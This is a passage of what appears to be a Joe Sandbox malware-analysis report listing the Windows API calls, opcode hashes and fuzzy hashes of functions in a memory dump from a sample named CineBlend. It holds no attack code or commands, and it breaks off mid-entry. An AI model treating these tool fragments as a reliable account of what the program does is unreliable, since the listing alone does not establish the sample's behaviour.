                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 85176095b55e87ee0a8e2a02277b9bd8ed5db3352c438f531d9dd16dc045e794
                                          • Instruction ID: 1601ad74507fbdd665432d4e7dd2d858d880d456e04312b28ca675ca652be88a
                                          • Opcode Fuzzy Hash: 85176095b55e87ee0a8e2a02277b9bd8ed5db3352c438f531d9dd16dc045e794
                                          • Instruction Fuzzy Hash: 84018FB26052167EE62127786CC1F67678DDF413B8B3483A5F539A21D1EE608C408170
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00BA2394
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA23A6
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA23BC
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA23D7
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 5c815de60ffd7ecfbe35698dd99217ac6b4504ca32a8b2c56fabbfd7a22a0066
                                          • Instruction ID: beab9136dbf4a822dcb08f03588368ce6be2c859f0f6fdafb15884d1a404aec5
                                          • Opcode Fuzzy Hash: 5c815de60ffd7ecfbe35698dd99217ac6b4504ca32a8b2c56fabbfd7a22a0066
                                          • Instruction Fuzzy Hash: ED11093A901219FFEF119BA9CD85F9DFBB8FB09750F200091EA01B7290D6716E10DB94
                                          APIs
                                            • Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0
                                          • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B41AF4
                                          • GetClientRect.USER32(?,?), ref: 00B831F9
                                          • GetCursorPos.USER32(?), ref: 00B83203
                                          • ScreenToClient.USER32(?,?), ref: 00B8320E
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Client$CursorLongProcRectScreenWindow
                                          • String ID:
                                          • API String ID: 4127811313-0
                                          • Opcode ID: 2749b390836cc6fb182b6985fed8ef381160266fa08c300d1be5efe2d4a913e0
                                          • Instruction ID: 685d57101d28d92a87f3bd5c387e8f51a49a1f3b0f0c4907d60a06878979e8a0
                                          • Opcode Fuzzy Hash: 2749b390836cc6fb182b6985fed8ef381160266fa08c300d1be5efe2d4a913e0
                                          • Instruction Fuzzy Hash: 36113A31A01519BBDB00EFA8C9859EEB7F8EB05745F100892E912E3150D771BB91DBA1
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00BAEB14
                                          • MessageBoxW.USER32(?,?,?,?), ref: 00BAEB47
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00BAEB5D
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00BAEB64
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 2880819207-0
                                          • Opcode ID: da3b312dc8d554c8259264ac68fc1509345b4eaca3d210e7926df578e6aae27e
                                          • Instruction ID: 17440a9c41cc5122371415e86f883a7b3f6cab34fcaaece5e707a0617ecada5e
                                          • Opcode Fuzzy Hash: da3b312dc8d554c8259264ac68fc1509345b4eaca3d210e7926df578e6aae27e
                                          • Instruction Fuzzy Hash: 9B112B76905218BFCB019BA89C49BDE7FECEB47320F408256F835E32A0D674C90487B0
                                          APIs
                                          • CreateThread.KERNEL32(00000000,?,00B6D369,00000000,00000004,00000000), ref: 00B6D588
                                          • GetLastError.KERNEL32 ref: 00B6D594
                                          • __dosmaperr.LIBCMT ref: 00B6D59B
                                          • ResumeThread.KERNEL32(00000000), ref: 00B6D5B9
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                          • String ID:
                                          • API String ID: 173952441-0
                                          • Opcode ID: 356a16109cf2182b6e4ea30d0636e8905079764cfecab65d27d6a1c3cd5814b2
                                          • Instruction ID: d682b0a3a59d3e8cb634f8658ac41ec2d4cdea3c504e6be61ba4e751c887d4f3
                                          • Opcode Fuzzy Hash: 356a16109cf2182b6e4ea30d0636e8905079764cfecab65d27d6a1c3cd5814b2
                                          • Instruction Fuzzy Hash: FA01F932E011147BCB106FA5EC05BAE7BE8EF81334F100396F926871E0DF748800C6A1
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B478B1
                                          • GetStockObject.GDI32(00000011), ref: 00B478C5
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B478CF
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CreateMessageObjectSendStockWindow
                                          • String ID:
                                          • API String ID: 3970641297-0
                                          • Opcode ID: 16eb688cd515967e70ca5600401d34efb2c001c62fd953168ce172d60ece34ad
                                          • Instruction ID: 3d60e179af780991480a073abe0dc7d3ce2f60ece7268769586d1a5f827593b3
                                          • Opcode Fuzzy Hash: 16eb688cd515967e70ca5600401d34efb2c001c62fd953168ce172d60ece34ad
                                          • Instruction Fuzzy Hash: 1511AD72546509BFDF125F95CC58EEABBA9FF08364F040156FA0092120DB319D60FBA0
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BB11D9,00000000,00000000,?,00B7338D,00BB11D9,00000000,00000000,00000000,?,00B735FE,00000006,FlsSetValue), ref: 00B73418
                                          • GetLastError.KERNEL32(?,00B7338D,00BB11D9,00000000,00000000,00000000,?,00B735FE,00000006,FlsSetValue,00BE3260,FlsSetValue,00000000,00000364,?,00B731B9), ref: 00B73424
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B7338D,00BB11D9,00000000,00000000,00000000,?,00B735FE,00000006,FlsSetValue,00BE3260,FlsSetValue,00000000), ref: 00B73432
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: b91af0f523a4d9a1096639a5ae4d1bb7055b3b67ba3b5a9933d36687c2ea683f
                                          • Instruction ID: 3ba0dbb568e9a29d6b88897c9d3c1cb1906e3a81cb4e63990d9a55ee4c928a92
                                          • Opcode Fuzzy Hash: b91af0f523a4d9a1096639a5ae4d1bb7055b3b67ba3b5a9933d36687c2ea683f
                                          • Instruction Fuzzy Hash: 8B01F732652222ABCB364B79DC44A567BD8FF05F617218260F96EE7380DB20DD01D6E4
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00BA7DE6
                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00BA7DFE
                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00BA7E13
                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00BA7E31
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Type$Register$FileLoadModuleNameUser
                                          • String ID:
                                          • API String ID: 1352324309-0
                                          • Opcode ID: a9e3a400f2a54a2565204cc4588c975ef8be6a7935bda3f9e39b09502055e7db
                                          • Instruction ID: 27032a3d3cb7a49eb73362b88d3936490fab701ec5fe46afc53e5af81a358f7d
                                          • Opcode Fuzzy Hash: a9e3a400f2a54a2565204cc4588c975ef8be6a7935bda3f9e39b09502055e7db
                                          • Instruction Fuzzy Hash: 19116DB128E705ABE7208F64ED48B92BBFCEB05B00F1085E9A656D7150EBB1ED04DB50
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00BAB69A,?,00008000), ref: 00BABA8B
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00BAB69A,?,00008000), ref: 00BABAB0
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00BAB69A,?,00008000), ref: 00BABABA
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00BAB69A,?,00008000), ref: 00BABAED
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          • Opcode ID: ab049d3840e7a859c5aa878c1935cb7690b9217324bb73268af00eff901505dd
                                          • Instruction ID: 6eb2301e9cccabb2a4a0735cbf80c188a74017262f77df17c96364bf2b3bf7ce
                                          • Opcode Fuzzy Hash: ab049d3840e7a859c5aa878c1935cb7690b9217324bb73268af00eff901505dd
                                          • Instruction Fuzzy Hash: 9C117930C05A29E7CF009FA4E948BEEBBB8FF0A711F1140C6D991B2141DF308650CBA1
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00BD888E
                                          • ScreenToClient.USER32(?,?), ref: 00BD88A6
                                          • ScreenToClient.USER32(?,?), ref: 00BD88CA
                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BD88E5
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: 14ee9091632bff16daa08ed9cd0048f610d4f41da2b44d400b914471c3bbf584
                                          • Instruction ID: 992563e058ee6158465775a598fe0b097d48709528f43993c173d0fa57e6dfae
                                          • Opcode Fuzzy Hash: 14ee9091632bff16daa08ed9cd0048f610d4f41da2b44d400b914471c3bbf584
                                          • Instruction Fuzzy Hash: 041143B9D01209AFDB41CF98C884AEEFBF5FB08311F504156E955E3610E735AA54DF90
                                          APIs
                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00BA3712
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA3723
                                          • GetCurrentThreadId.KERNEL32 ref: 00BA372A
                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00BA3731
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                          • String ID:
                                          • API String ID: 2710830443-0
                                          • Opcode ID: 647a2d13e7e149e968528e84fc6de12dc0c777a00cd3df1954e96b576940eb2b
                                          • Instruction ID: 6b6f77d21fe6dce85e42466b89b68cc36fc30d799cadd2501628394e7ecd809d
                                          • Opcode Fuzzy Hash: 647a2d13e7e149e968528e84fc6de12dc0c777a00cd3df1954e96b576940eb2b
                                          • Instruction Fuzzy Hash: D9E06DB12062247ADA2017A29C8DEEBBFACDF43BA1F400096F105D2080EEA0C940C2B0
                                          APIs
                                            • Part of subcall function 00B41F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B41F87
                                            • Part of subcall function 00B41F2D: SelectObject.GDI32(?,00000000), ref: 00B41F96
                                            • Part of subcall function 00B41F2D: BeginPath.GDI32(?), ref: 00B41FAD
                                            • Part of subcall function 00B41F2D: SelectObject.GDI32(?,00000000), ref: 00B41FD6
                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00BD92E3
                                          • LineTo.GDI32(?,?,?), ref: 00BD92F0
                                          • EndPath.GDI32(?), ref: 00BD9300
                                          • StrokePath.GDI32(?), ref: 00BD930E
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                          • String ID:
                                          • API String ID: 1539411459-0
                                          • Opcode ID: 0f8e8f83b7b9081e287671623b3268dbf90cdbfc386ae9059fcd72c35565e1de
                                          • Instruction ID: ef6ea1c1ddcd10ec0c470555381422be44f60aaa82bfca8fe5085d7af083f360
                                          • Opcode Fuzzy Hash: 0f8e8f83b7b9081e287671623b3268dbf90cdbfc386ae9059fcd72c35565e1de
                                          • Instruction Fuzzy Hash: BDF0E231002258BBDB121F58AC0EFCE7F99AF0A320F008042FA15220E1DB755522DFE9
                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 00B421BC
                                          • SetTextColor.GDI32(?,?), ref: 00B421C6
                                          • SetBkMode.GDI32(?,00000001), ref: 00B421D9
                                          • GetStockObject.GDI32(00000005), ref: 00B421E1
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Color$ModeObjectStockText
                                          • String ID:
                                          • API String ID: 4037423528-0
                                          • Opcode ID: 9764ae0fefbc780c7ca2bda39d9b501b7614430f6c120da9ef9039a02c4b5b4a
                                          • Instruction ID: e47a1700b3826379719e272687fa7b66428ec9fff8d545c60dd36d9f88d51bc1
                                          • Opcode Fuzzy Hash: 9764ae0fefbc780c7ca2bda39d9b501b7614430f6c120da9ef9039a02c4b5b4a
                                          • Instruction Fuzzy Hash: BAE09B31241640AEDB215F74BC197E97F91EB11735F04825AF7F5650E0DB718640DB10
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00B9EC36
                                          • GetDC.USER32(00000000), ref: 00B9EC40
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B9EC60
                                          • ReleaseDC.USER32(?), ref: 00B9EC81
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 3ce83080fbd747381a0625dc778a09d74e71d2c3783afd41f7cf777681457fee
                                          • Instruction ID: a4cd0a4c8de009364b750ffde423db567daeff1908479c81b4cab660611d013d
                                          • Opcode Fuzzy Hash: 3ce83080fbd747381a0625dc778a09d74e71d2c3783afd41f7cf777681457fee
                                          • Instruction Fuzzy Hash: 87E01A70805204DFCF409FA0C958A5DFBF5FB48311F10849AE99AE3250DB389A01AF40
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00B9EC4A
                                          • GetDC.USER32(00000000), ref: 00B9EC54
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B9EC60
                                          • ReleaseDC.USER32(?), ref: 00B9EC81
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: cacf1e423cdba1189049dc035ce6754f714ebefc4709f08c2ef5c4f43be41275
                                          • Instruction ID: 8bbc14713a86f8117e630a51c4b902799a0b7035124e32e4cecc53e64657e75e
                                          • Opcode Fuzzy Hash: cacf1e423cdba1189049dc035ce6754f714ebefc4709f08c2ef5c4f43be41275
                                          • Instruction Fuzzy Hash: D9E01A70C01204DFCF409FA0C858A5DFBF5FB48311F10848AE999E3250DB389A019F40
                                          APIs
                                            • Part of subcall function 00B441EA: _wcslen.LIBCMT ref: 00B441EF
                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00BB5919
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Connection_wcslen
                                          • String ID: *$LPT
                                          • API String ID: 1725874428-3443410124
                                          • Opcode ID: 91ce6fba07127bf2d8833c47529151f53ecfeda8572a95ed5b851374e1d15815
                                          • Instruction ID: 1564f0ea83fc0ed331e63771591b9ea62cef77a16ced8fdb1590d0363a8013cc
                                          • Opcode Fuzzy Hash: 91ce6fba07127bf2d8833c47529151f53ecfeda8572a95ed5b851374e1d15815
                                          • Instruction Fuzzy Hash: 2D914B75A006049FCB24DF54C8D4BAABBF5EF44314F1980D9E849AB362C7B1EE85CB91
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00B6E67D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: 2363632fd159401483ab7fa57c2ed2ecc3753f3e322cbacb255e1d08996d1611
                                          • Instruction ID: e1b35e3e480afdc993a76b631e904a730f679efe5cc662d57011a155751ae9d1
                                          • Opcode Fuzzy Hash: 2363632fd159401483ab7fa57c2ed2ecc3753f3e322cbacb255e1d08996d1611
                                          • Instruction Fuzzy Hash: E251C165E4810286CB117714CD8937A2BE4EB14B00F70CDD8F0B9972E9DF39CD959B86
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
